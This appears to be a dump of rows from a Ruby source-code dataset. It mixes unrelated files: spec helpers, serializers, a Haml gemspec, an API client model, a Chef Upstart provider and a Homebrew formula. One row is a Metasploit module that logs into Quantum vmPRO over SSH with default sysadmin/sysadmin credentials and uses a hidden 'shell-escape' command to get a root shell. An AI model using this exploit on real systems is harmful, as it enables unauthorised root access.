hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
62b554bf5f2e610b6d4fcc70e1dcf885719a125a | 53 | module InvoicePrinter
  # Gem version string; the '.alpha2' suffix marks this as a prerelease.
  VERSION = '2.2.0.alpha2'
end
| 13.25 | 26 | 0.735849 |
ac460cc21c919ea94c8f0e609c59881a6d4eed13 | 3,585 | #-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2015 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
# FIXME: deprecate this example and replace by 'has an untitled action link'
# it does not work as intended (setting user has no effect, but by chance :role overrides base spec)
# it does not check the actual href/method
# Shared example asserting that an action link ("_links/<action>/href") is
# absent without the relevant permission and present (optionally with the
# expected href) once the permission is granted.
# Expects the host spec to define: `subject` (JSON body), `action`,
# `permission`, and `project`; `href` may be overridden to pin the URL.
shared_examples_for 'action link' do
  # Base role grants only view/edit; the action's permission is added later.
  let(:role) { FactoryGirl.create(:role, permissions: [:view_work_packages, :edit_work_packages]) }
  let(:user) {
    FactoryGirl.create(:user, member_in_project: project,
                              member_through_role: role)
  }
  # nil by default: the href assertion below is skipped unless overridden.
  let(:href) { nil }

  before do login_as(user) end

  # Without the extra permission the link must not be rendered.
  it { expect(subject).not_to have_json_path("_links/#{action}/href") }

  describe 'with permission' do
    before do
      role.permissions << permission
      role.save!
    end

    it { expect(subject).to have_json_path("_links/#{action}/href") }

    # Only checks the href value when the host spec supplies one.
    it do
      if href
        expect(subject).to be_json_eql(href.to_json).at_path("_links/#{action}/href")
      end
    end
  end
end
# Shared example for action links: an untitled link with the expected HTTP
# method, which disappears when `permission` is removed from `permissions`.
# Expects the host spec to define: `link`, `method`, `permission`, and
# `all_permissions`.
shared_examples_for 'has an untitled action link' do
  it_behaves_like 'has an untitled link'

  it 'indicates the desired method' do
    is_expected.to be_json_eql(method.to_json).at_path("_links/#{link}/method")
  end

  describe 'without permission' do
    # All permissions except the one guarding this action.
    let(:permissions) { all_permissions - [permission] }

    it_behaves_like 'has no link'
  end
end
# Shared example: link is present with both the expected href and title.
# Expects `link`, `href`, and `title` from the host spec.
shared_examples_for 'has a titled link' do
  it { is_expected.to be_json_eql(href.to_json).at_path("_links/#{link}/href") }
  it { is_expected.to be_json_eql(title.to_json).at_path("_links/#{link}/title") }
end
# Shared example: link has the expected href and no title attribute.
# Expects `link` and `href` from the host spec.
shared_examples_for 'has an untitled link' do
  it { is_expected.to be_json_eql(href.to_json).at_path("_links/#{link}/href") }
  it { is_expected.not_to have_json_path("_links/#{link}/title") }
end
# Shared example: link has the expected href and is flagged as a URI template
# ("templated": true). Expects `link` and `href` from the host spec.
shared_examples_for 'has a templated link' do
  it { is_expected.to be_json_eql(href.to_json).at_path("_links/#{link}/href") }
  it { is_expected.to be_json_eql(true.to_json).at_path("_links/#{link}/templated") }
end
# Shared example: link exists but its href is null, and nothing is embedded
# for it. Expects `link` from the host spec.
shared_examples_for 'has an empty link' do
  it { is_expected.to be_json_eql(nil.to_json).at_path("_links/#{link}/href") }

  it 'has no embedded resource' do
    is_expected.not_to have_json_path("_embedded/#{link}")
  end
end
# Shared example: the link is entirely absent, both from "_links" and from
# "_embedded". Expects `link` from the host spec.
shared_examples_for 'has no link' do
  it { is_expected.not_to have_json_path("_links/#{link}") }

  it 'has no embedded resource' do
    is_expected.not_to have_json_path("_embedded/#{link}")
  end
end
| 33.504673 | 100 | 0.728312 |
91e9fc7eaef1f904353f6213ae02600bebf7c84a | 196 | class MealSerializer < ActiveModel::Serializer
  # Serializes a Meal for API responses, exposing its nutrition attributes.
  # The *_percentage fields are presumably computed on the Meal model —
  # verify against the model definition.
  attributes :id, :date, :calories, :carbohydrates, :fat, :protein,
             :carbohydrates_percentage, :fat_percentage, :protein_percentage
end
| 39.2 | 76 | 0.744898 |
ac2a5674a36064f28fe41be533f555f192c6b382 | 3,618 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
# Exploit module for the Quantum vmPRO "shell-escape" SSH backdoor.
# Logs in over SSH with (default) sysadmin credentials and runs the hidden
# "shell-escape" command to obtain a root shell via a command stream.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Quantum vmPRO Backdoor Command',
        'Description' => %q{
          This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin
          privileges, can get access to the restricted SSH shell. By using the hidden backdoor
          "shell-escape" command it's possible to drop to a real root bash shell. This module
          has been tested successfully on Quantum vmPRO 3.1.2.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'xistence <xistence[at]0x90.nl>' # Original discovery and Metasploit module
        ],
        'References' => [
          ['PACKETSTORM', '125760']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Payload' => {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['Quantum vmPRO 3.1.2', {}],
        ],
        'Privileged' => true,
        'DisclosureDate' => '2014-03-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22),
        OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']),
        OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin'])
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  # Target host, read from the module datastore.
  def rhost
    datastore['RHOST']
  end

  # Target SSH port, read from the module datastore.
  def rport
    datastore['RPORT']
  end

  # Attempts an SSH login and, on success, wraps the session in a
  # CommandStream bound to the hidden 'shell-escape' backdoor command.
  # Returns the CommandStream, or nil on any connection/auth failure.
  def do_login(user, pass)
    opts = ssh_client_defaults.merge({
      auth_methods: ['password', 'keyboard-interactive'],
      port: rport,
      password: pass
    })
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      return nil
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return nil
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return nil
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
      return nil
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return nil
    end

    if ssh
      conn = Net::SSH::CommandStream.new(ssh, 'shell-escape')
      return conn
    end

    return nil
  end

  def exploit
    user = datastore['USER']
    pass = datastore['PASS']

    print_status("#{rhost}:#{rport} - Attempt to login...")
    conn = do_login(user, pass)
    if conn
      # FIX: the previous message had an unbalanced quote: "('#{user}:#{pass})"
      print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass}')")
      handler(conn.lsock)
    end
  end
end
| 27.409091 | 102 | 0.576562 |
bb706d290302faa61f084d0cde472e7e7d527af1 | 2,225 | module Common
class RegisteredOrganisationResponse
def initialize(ccs_org_id, hidden: true)
super()
@ccs_org_id = ccs_org_id
@results = hidden.blank? ? search_organisation : search_organisation_all
@primary_name = ''
@primary_identifier = {}
@additional_identifier = []
end
def search_organisation
OrganisationSchemeIdentifier.select(:scheme_org_reg_number, :scheme_code, :primary_scheme, :uri, :legal_name).where(ccs_org_id: @ccs_org_id).where(hidden: false)
end
def search_organisation_all
OrganisationSchemeIdentifier.select(:scheme_org_reg_number, :scheme_code, :primary_scheme, :hidden, :uri, :legal_name).where(ccs_org_id: @ccs_org_id)
end
def response_payload
build_response
[
identifier: @primary_identifier,
additionalIdentifiers: @additional_identifier
]
end
def build_response
@results.each do |result|
build_response_structure(result)
end
end
def build_response_structure(result)
@primary_identifier = indetifier_primary_scheme(result) if result.primary_scheme
@additional_identifier.push(indetifier_scheme(result)) unless result.primary_scheme
end
def primary_scheme_name(indetifier)
indetifier.legal_name.present? ? indetifier.legal_name : ''
end
def indetifier_primary_scheme(indetifier)
{
scheme: indetifier.scheme_code,
id: indetifier.scheme_org_reg_number,
legalName: legal_name(indetifier),
uri: uri(indetifier)
}
end
def indetifier_scheme(indetifier)
scheme_indetifier = {
scheme: indetifier.scheme_code,
id: indetifier.scheme_org_reg_number,
legalName: legal_name(indetifier),
uri: uri(indetifier)
}
scheme_indetifier[:hidden] = hidden_status(indetifier) if indetifier.attributes.key?('hidden')
scheme_indetifier
end
def hidden_status(indetifier)
indetifier.hidden ? true : false
end
def legal_name(indetifier)
indetifier.legal_name.present? ? indetifier.legal_name : ''
end
def uri(indetifier)
indetifier.uri.present? ? indetifier.uri : ''
end
end
end
| 28.525641 | 167 | 0.697528 |
62a14f0a18cd90b87cbcca23811850949e4dac07 | 1,799 | require 'rubygems'
# Note that Haml's gem-compilation process requires access to the filesystem.
# This means that it cannot be automatically run by e.g. GitHub's gem system.
# However, a build server automatically packages the master branch
# every time it's pushed to; this is made available as the haml-edge gem.
# Gemspec for Haml. Published as 'haml-edge' when EDGE_GEM_VERSION exists
# next to this file (CI edge builds), otherwise as 'haml'.
HAML_GEMSPEC = Gem::Specification.new do |spec|
  # NOTE(review): rubyforge_project and has_rdoc below are long-deprecated
  # gemspec attributes; kept as-is for compatibility with the old tooling
  # this file targets.
  spec.rubyforge_project = 'haml'
  spec.name = File.exist?(File.dirname(__FILE__) + '/EDGE_GEM_VERSION') ? 'haml-edge' : 'haml'
  spec.summary = "An elegant, structured XHTML/XML templating engine.\nComes with Sass, a similar CSS templating engine."
  # Version is read from the VERSION file so release tooling can bump it.
  spec.version = File.read(File.dirname(__FILE__) + '/VERSION').strip
  spec.authors = ['Nathan Weizenbaum', 'Chris Eppstein', 'Hampton Catlin']
  spec.email = '[email protected]'
  spec.description = <<-END
      Haml (HTML Abstraction Markup Language) is a layer on top of XHTML or XML
      that's designed to express the structure of XHTML or XML documents
      in a non-repetitive, elegant, easy way,
      using indentation rather than closing tags
      and allowing Ruby to be embedded with ease.
      It was originally envisioned as a plugin for Ruby on Rails,
      but it can function as a stand-alone templating engine.
    END

  spec.add_development_dependency 'yard', '>= 0.5.3'
  spec.add_development_dependency 'maruku', '>= 0.5.9'

  # Top-level files that look like README-style docs (all-caps names, no
  # extension), excluding TODO.
  readmes = Dir['*'].reject{ |x| x =~ /(^|[^.a-z])[a-z]+/ || x == "TODO" }
  spec.executables = ['haml', 'html2haml', 'sass', 'css2sass', 'sass-convert']
  spec.files = Dir['rails/init.rb', 'lib/**/*', 'vendor/fssm/**/*',
                   'bin/*', 'test/**/*', 'extra/**/*', 'Rakefile', 'init.rb',
                   '.yardopts'] + readmes
  spec.homepage = 'http://haml-lang.com/'
  spec.has_rdoc = false
  spec.test_files = Dir['test/**/*_test.rb']
end
| 49.972222 | 121 | 0.685937 |
26f575c12989a45b1277a4091ab9eaf42cfdfc81 | 5,957 | =begin
#rokka.io
#digital image processing done right. [Documentation](https://rokka.io/documentation). [Changelog](https://api.rokka.io/changelog.md).
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.3.1
=end
require 'date'
module RokkaClientCodegen
  # Swagger-generated model for a rokka.io user account.
  # NOTE(review): generated by swagger-codegen 2.3.1 — avoid hand-editing the
  # serialization plumbing below; regenerate from the spec instead.
  class User
    attr_accessor :id

    # Can be changed (v2)
    attr_accessor :email

    attr_accessor :api_key

    attr_accessor :api_secret

    # Attribute mapping from ruby-style variable name to JSON key.
    def self.attribute_map
      {
        :'id' => :'id',
        :'email' => :'email',
        :'api_key' => :'api_key',
        :'api_secret' => :'api_secret'
      }
    end

    # Attribute type mapping.
    def self.swagger_types
      {
        :'id' => :'String',
        :'email' => :'String',
        :'api_key' => :'String',
        :'api_secret' => :'String'
      }
    end

    # Initializes the object
    # @param [Hash] attributes Model attributes in the form of hash
    def initialize(attributes = {})
      return unless attributes.is_a?(Hash)

      # convert string to symbol for hash key
      attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}

      if attributes.has_key?(:'id')
        self.id = attributes[:'id']
      end

      if attributes.has_key?(:'email')
        self.email = attributes[:'email']
      end

      if attributes.has_key?(:'api_key')
        self.api_key = attributes[:'api_key']
      end

      if attributes.has_key?(:'api_secret')
        self.api_secret = attributes[:'api_secret']
      end
    end

    # Show invalid properties with the reasons. Usually used together with valid?
    # @return Array for valid properties with the reasons
    def list_invalid_properties
      invalid_properties = Array.new
      return invalid_properties
    end

    # Check to see if the all the properties in the model are valid
    # @return true if the model is valid
    def valid?
      return true
    end

    # Checks equality by comparing each attribute.
    # @param [Object] Object to be compared
    def ==(o)
      return true if self.equal?(o)
      self.class == o.class &&
          id == o.id &&
          email == o.email &&
          api_key == o.api_key &&
          api_secret == o.api_secret
    end

    # @see the `==` method
    # @param [Object] Object to be compared
    def eql?(o)
      self == o
    end

    # Calculates hash code according to all attributes.
    # @return [Integer] Hash code (Fixnum in the generator's original docs;
    #   Fixnum is deprecated in modern Ruby)
    def hash
      [id, email, api_key, api_secret].hash
    end

    # Builds the object from hash
    # @param [Hash] attributes Model attributes in the form of hash
    # @return [Object] Returns the model itself
    def build_from_hash(attributes)
      return nil unless attributes.is_a?(Hash)
      self.class.swagger_types.each_pair do |key, type|
        if type =~ /\AArray<(.*)>/i
          # check to ensure the input is an array given that the the attribute
          # is documented as an array but the input is not
          if attributes[self.class.attribute_map[key]].is_a?(Array)
            self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
          end
        elsif !attributes[self.class.attribute_map[key]].nil?
          self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
        end # or else data not found in attributes(hash), not an issue as the data can be optional
      end

      self
    end

    # Deserializes the data based on type
    # @param string type Data type
    # @param string value Value to be deserialized
    # @return [Object] Deserialized data
    def _deserialize(type, value)
      case type.to_sym
      when :DateTime
        DateTime.parse(value)
      when :Date
        Date.parse(value)
      when :String
        value.to_s
      when :Integer
        value.to_i
      when :Float
        value.to_f
      when :BOOLEAN
        if value.to_s =~ /\A(true|t|yes|y|1)\z/i
          true
        else
          false
        end
      when :Object
        # generic object (usually a Hash), return directly
        value
      when /\AArray<(?<inner_type>.+)>\z/
        inner_type = Regexp.last_match[:inner_type]
        value.map { |v| _deserialize(inner_type, v) }
      when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
        k_type = Regexp.last_match[:k_type]
        v_type = Regexp.last_match[:v_type]
        {}.tap do |hash|
          value.each do |k, v|
            hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
          end
        end
      else # model
        temp_model = RokkaClientCodegen.const_get(type).new
        temp_model.build_from_hash(value)
      end
    end

    # Returns the string representation of the object
    # @return [String] String presentation of the object
    def to_s
      to_hash.to_s
    end

    # to_body is an alias to to_hash (backward compatibility)
    # @return [Hash] Returns the object in the form of hash
    def to_body
      to_hash
    end

    # Returns the object in the form of hash
    # @return [Hash] Returns the object in the form of hash
    def to_hash
      hash = {}
      self.class.attribute_map.each_pair do |attr, param|
        value = self.send(attr)
        next if value.nil?
        hash[param] = _to_hash(value)
      end
      hash
    end

    # Outputs non-array value in the form of hash
    # For object, use to_hash. Otherwise, just return the value
    # @param [Object] value Any valid value
    # @return [Hash] Returns the value in the form of hash
    def _to_hash(value)
      if value.is_a?(Array)
        value.compact.map{ |v| _to_hash(v) }
      elsif value.is_a?(Hash)
        {}.tap do |hash|
          value.each { |k, v| hash[k] = _to_hash(v) }
        end
      elsif value.respond_to? :to_hash
        value.to_hash
      else
        value
      end
    end
  end
end
| 27.451613 | 134 | 0.605842 |
1c1df771995a6ee59a713a4dfb2d2710c678433d | 1,992 | class PlaceTaxonName < ActiveRecord::Base
  # Join model scoping a TaxonName (e.g. a common name) to a geographic Place.
  belongs_to :place, :inverse_of => :place_taxon_names
  belongs_to :taxon_name, :inverse_of => :place_taxon_names
  # Each (place, taxon_name) pair may exist at most once.
  validates_uniqueness_of :place_id, :scope => :taxon_name_id
  validates_presence_of :place_id, :taxon_name_id

  # Compact debug representation.
  def to_s
    "<PlaceTaxonName #{id}, place_id: #{place_id}, taxon_name_id: #{taxon_name_id}>"
  end

  #
  # Create PlaceTaxonNames for matching countries. This helps people who
  # cannot choose a locale that matches a lexicon but can choose a place.
  #
  # @param options [Hash] :logger overrides Rails.logger; :mapping overrides
  #   the default lexicon => country-name(s) mapping below.
  def self.create_country_records_from_lexicons(options = {})
    start = Time.now
    logger = options[:logger] || Rails.logger
    created = 0
    errors = 0
    mapping = options[:mapping] || {
      Japanese: [:Japan],
      German: [:Germany, :Austria],
      chinese_traditional: ['Hong Kong', :Taiwan],
      chinese_simplified: [:China]
    }
    mapping.each do |lexicon, country_names|
      countries = Place.where(admin_level: Place::COUNTRY_LEVEL, name: country_names).to_a
      TaxonName.joins("LEFT OUTER JOIN place_taxon_names ptn ON ptn.taxon_name_id = taxon_names.id").
        includes(:place_taxon_names).
        where("taxon_names.lexicon = ?", lexicon).find_each do |tn|
        # not a fan of the overselection and filter approach here, since we have a lot of names. Is there a way to do this in the db?
        # Only countries this name is not already associated with.
        candidate_countries = countries.select{|c| !tn.place_ids.include?(c.id)}
        next if candidate_countries.blank?
        candidate_countries.each do |country|
          ptn = PlaceTaxonName.new(taxon_name: tn, place: country)
          if ptn.save
            logger.info "Added #{tn} to #{country}"
            created += 1
          else
            # Save failures are logged and counted, not raised.
            logger.error "[ERROR] Failed to save #{ptn}: #{ptn.errors.full_messages.to_sentence}"
            errors += 1
          end
        end
      end
    end
    logger.info "Created #{created} PlaceTaxonName records, failed on #{errors} (#{Time.now - start}s)"
  end
end
| 40.653061 | 133 | 0.666165 |
4a4ab15205a6dd60f6bf699f99bc6a81aac30bef | 591 | # frozen_string_literal: true
module ElasticAPM
  # @api private
  module Spies
    # @api private
    # Spy that patches ActionDispatch::ShowExceptions so that every exception
    # Rails is about to render is first reported to ElasticAPM.
    class ActionDispatchSpy
      def install
        ::ActionDispatch::ShowExceptions.class_eval do
          # Keep the original under a new name, then wrap it.
          alias render_exception_without_apm render_exception

          def render_exception(env, exception)
            ElasticAPM.report(exception)
            render_exception_without_apm env, exception
          end
        end
      end
    end

    # Install the spy when 'action_dispatch/show_exception' gets required.
    register(
      'ActionDispatch::ShowExceptions',
      'action_dispatch/show_exception',
      ActionDispatchSpy.new
    )
  end
end
| 21.888889 | 61 | 0.663283 |
ac12190bea0aee08574e3d552c30d1640671a847 | 1,245 | # typed: false
# frozen_string_literal: true
# :nodoc:
# Homebrew formula exposing BBEdit's bundled command-line helpers.
# Installs nothing itself: it downloads an empty tarball and then symlinks
# the tools and man pages out of /Applications/BBEdit.app.
class BbeditCli < Formula
  desc "BBEdit Command-Line Tools"
  homepage "https://www.barebones.com/products/bbedit/index.html"
  # Deliberately an empty archive — see the symlink-only install below.
  url "https://github.com/josh/homebrew-tap/raw/4b9c17f996fd897382ad812a472a551d116f7172/empty.tar"
  version "0.1.0"
  sha256 "9bfac43f415467832a8470a10da79435da99c950cd20b7fae458eb2144f0ff7a"

  livecheck do
    skip "Unsupported"
  end

  # The bbedit cask ships the same binaries.
  conflicts_with cask: "bbedit"

  def install
    bin.install_symlink "/Applications/BBEdit.app/Contents/Helpers/bbedit_tool" => "bbedit"
    bin.install_symlink "/Applications/BBEdit.app/Contents/Helpers/bbdiff" => "bbdiff"
    bin.install_symlink "/Applications/BBEdit.app/Contents/Helpers/bbfind" => "bbfind"
    bin.install_symlink "/Applications/BBEdit.app/Contents/Helpers/bbresults" => "bbresults"

    man1.install_symlink "/Applications/BBEdit.app/Contents/Resources/bbedit.1" => "bbedit.1"
    man1.install_symlink "/Applications/BBEdit.app/Contents/Resources/bbdiff.1" => "bbdiff.1"
    man1.install_symlink "/Applications/BBEdit.app/Contents/Resources/bbfind.1" => "bbfind.1"
    man1.install_symlink "/Applications/BBEdit.app/Contents/Resources/bbresults.1" => "bbresults.1"
  end

  # Placeholder test block (no meaningful check is possible without the app).
  test do
    42
  end
end
| 37.727273 | 99 | 0.759839 |
e2e197a4b5628fc46582edd00ed56b3755cb3b2c | 270 | class Forest::Error < StandardError
  # Optional contextual object carried alongside the error message.
  attr_reader :object

  # @param msg [String] the error message (defaults to 'Forest::Error')
  # @param object [Object, nil] arbitrary context attached to the error
  def initialize(msg = 'Forest::Error', object = nil)
    @object = object
    super(msg)
  end
end
# Usage example:
# begin
#   raise Forest::Error.new("my message", "my thing")
# rescue => e
#   puts e.object # "my thing"
# end
| 16.875 | 52 | 0.644444 |
edd41dba7e67be36519837a8b8c413314232890a | 9,565 | #
# Author:: Bryan McLellan <[email protected]>
# Copyright:: Copyright 2010-2016, Bryan McLellan
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "chef/resource/service"
require "chef/provider/service/simple"
require "chef/mixin/command"
require "chef/util/file_edit"
class Chef
  class Provider
    class Service
      # Service provider that drives Upstart-managed services through the
      # native /sbin/{start,stop,restart,reload,status} tools and toggles
      # enablement by editing the job's "start on" stanza in its config file.
      class Upstart < Chef::Provider::Service::Simple
        provides :service, platform_family: "debian", override: true do |node|
          Chef::Platform::ServiceHelpers.service_resource_providers.include?(:upstart)
        end

        # Parses "/sbin/status" output such as "job start/running" or
        # "job (instance) start/running"; capture group 2 is the state word.
        UPSTART_STATE_FORMAT = /\S+ \(?(start|stop)?\)? ?[\/ ](\w+)/

        def self.supports?(resource, action)
          Chef::Platform::ServiceHelpers.config_for_service(resource.service_name).include?(:upstart)
        end

        # Upstart does more than start or stop a service, creating multiple 'states' [1] that a service can be in.
        # In chef, when we ask a service to start, we expect it to have started before performing the next step
        # since we have top down dependencies. Which is to say we may follow witha resource next that requires
        # that service to be running. According to [2] we can trust that sending a 'goal' such as start will not
        # return until that 'goal' is reached, or some error has occurred.
        #
        # [1] http://upstart.ubuntu.com/wiki/JobStates
        # [2] http://www.netsplit.com/2008/04/27/upstart-05-events/
        def initialize(new_resource, run_context)
          # TODO: re-evaluate if this is needed after integrating cookbook fix
          raise ArgumentError, "run_context cannot be nil" unless run_context
          super

          run_context.node

          # dup so we can mutate @job
          @job = @new_resource.service_name.dup

          # Upstart accepts KEY=value parameters appended to the job name.
          if @new_resource.parameters
            @new_resource.parameters.each do |key, value|
              @job << " #{key}=#{value}"
            end
          end
          platform, version = Chef::Platform.find_platform_and_version(run_context.node)
          # Ubuntu 8.04-9.04 shipped the early Upstart layout (/etc/event.d,
          # no .conf suffix); later releases use /etc/init/<job>.conf.
          if platform == "ubuntu" && (8.04..9.04).include?(version.to_f)
            @upstart_job_dir = "/etc/event.d"
            @upstart_conf_suffix = ""
          else
            @upstart_job_dir = "/etc/init"
            @upstart_conf_suffix = ".conf"
          end

          @command_success = true # new_resource.status_command= false, means upstart used
          @config_file_found = true
          @upstart_command_success = true
        end

        def define_resource_requirements
          # Do not call super, only call shared requirements
          shared_resource_requirements

          requirements.assert(:all_actions) do |a|
            # NOTE(review): whyrun_msg is only assigned when the status check
            # failed; when it succeeded the assertion passes and the whyrun
            # message is never emitted.
            if !@command_success
              whyrun_msg = @new_resource.status_command ? "Provided status command #{@new_resource.status_command} failed." :
                "Could not determine upstart state for service"
            end
            a.assertion { @command_success }
            # no failure here, just document the assumptions made.
            a.whyrun "#{whyrun_msg} Assuming service installed and not running."
          end

          requirements.assert(:all_actions) do |a|
            a.assertion { @config_file_found }
            # no failure here, just document the assumptions made.
            a.whyrun "Could not find #{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}. Assuming service is disabled."
          end
        end

        # Determines running state (via status command or upstart's native
        # status) and enabled state (by reading the job config's "start on"
        # stanza), populating @current_resource.
        def load_current_resource
          @current_resource = Chef::Resource::Service.new(@new_resource.name)
          @current_resource.service_name(@new_resource.service_name)

          # Get running/stopped state
          # We do not support searching for a service via ps when using upstart since status is a native
          # upstart function. We will however support status_command in case someone wants to do something special.
          if @new_resource.status_command
            Chef::Log.debug("#{@new_resource} you have specified a status command, running..")

            begin
              if shell_out!(@new_resource.status_command).exitstatus == 0
                @current_resource.running true
              end
            rescue
              # Failures fall back to "not running" and flag the command
              # failure for the whyrun assertion above.
              @command_success = false
              @current_resource.running false
              nil
            end
          else
            begin
              if upstart_state == "running"
                @current_resource.running true
              else
                @current_resource.running false
              end
            rescue Chef::Exceptions::Exec
              @command_success = false
              @current_resource.running false
              nil
            end
          end

          # Get enabled/disabled state by reading job configuration file
          if ::File.exists?("#{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}")
            Chef::Log.debug("#{@new_resource} found #{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}")
            ::File.open("#{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}", "r") do |file|
              while line = file.gets
                case line
                when /^start on/
                  Chef::Log.debug("#{@new_resource} enabled: #{line.chomp}")
                  @current_resource.enabled true
                  break
                when /^#start on/
                  Chef::Log.debug("#{@new_resource} disabled: #{line.chomp}")
                  @current_resource.enabled false
                  break
                end
              end
            end
          else
            @config_file_found = false
            Chef::Log.debug("#{@new_resource} did not find #{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}")
            @current_resource.enabled false
          end

          @current_resource
        end

        def start_service
          # Calling start on a service that is already started will return 1
          # Our 'goal' when we call start is to ensure the service is started
          if @current_resource.running
            Chef::Log.debug("#{@new_resource} already running, not starting")
          else
            if @new_resource.start_command
              super
            else
              shell_out_with_systems_locale!("/sbin/start #{@job}")
            end
          end
        end

        def stop_service
          # Calling stop on a service that is already stopped will return 1
          # Our 'goal' when we call stop is to ensure the service is stopped
          unless @current_resource.running
            Chef::Log.debug("#{@new_resource} not running, not stopping")
          else
            if @new_resource.stop_command
              super
            else
              shell_out_with_systems_locale!("/sbin/stop #{@job}")
            end
          end
        end

        def restart_service
          if @new_resource.restart_command
            super
          # Upstart always provides restart functionality so we don't need to mimic it with stop/sleep/start.
          # Older versions of upstart would fail on restart if the service was currently stopped, check for that. LP:430883
          else
            if @current_resource.running
              shell_out_with_systems_locale!("/sbin/restart #{@job}")
            else
              start_service
            end
          end
        end

        def reload_service
          if @new_resource.reload_command
            super
          else
            # upstart >= 0.6.3-4 supports reload (HUP)
            shell_out_with_systems_locale!("/sbin/reload #{@job}")
          end
        end

        # https://bugs.launchpad.net/upstart/+bug/94065
        def enable_service
          Chef::Log.debug("#{@new_resource} upstart lacks inherent support for enabling services, editing job config file")
          conf = Chef::Util::FileEdit.new("#{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}")
          conf.search_file_replace(/^#start on/, "start on")
          conf.write_file
        end

        def disable_service
          Chef::Log.debug("#{@new_resource} upstart lacks inherent support for disabling services, editing job config file")
          conf = Chef::Util::FileEdit.new("#{@upstart_job_dir}/#{@new_resource.service_name}#{@upstart_conf_suffix}")
          conf.search_file_replace(/^start on/, "#start on")
          conf.write_file
        end

        # Runs "/sbin/status <job>" and returns the state word parsed from
        # the first output line (returns from inside the block).
        def upstart_state
          command = "/sbin/status #{@job}"
          status = popen4(command) do |pid, stdin, stdout, stderr|
            stdout.each_line do |line|
              # service goal/state
              # OR
              # service (instance) goal/state
              # OR
              # service (goal) state
              line =~ UPSTART_STATE_FORMAT
              data = Regexp.last_match
              return data[2]
            end
          end
        end
      end
    end
  end
end
| 39.36214 | 141 | 0.603659 |
875ea6fbbaf134e291c9bbe925f37dbd45c87305 | 133 | class MixTask < Task
def initialize
super('Mix that batter up!')
end
def get_time_required
3.0 # Mix for 3 minutes
end
end | 14.777778 | 30 | 0.706767 |
1c3d3a31b8eac0196995f9b7cb09c19041fce422 | 1,751 | # frozen_string_literal: true
require 'cuprum/collections/basic/commands/update_one'
require 'cuprum/collections/basic/query'
require 'cuprum/collections/basic/rspec/command_contract'
require 'cuprum/collections/rspec/update_one_command_contract'
require 'support/examples/basic_command_examples'
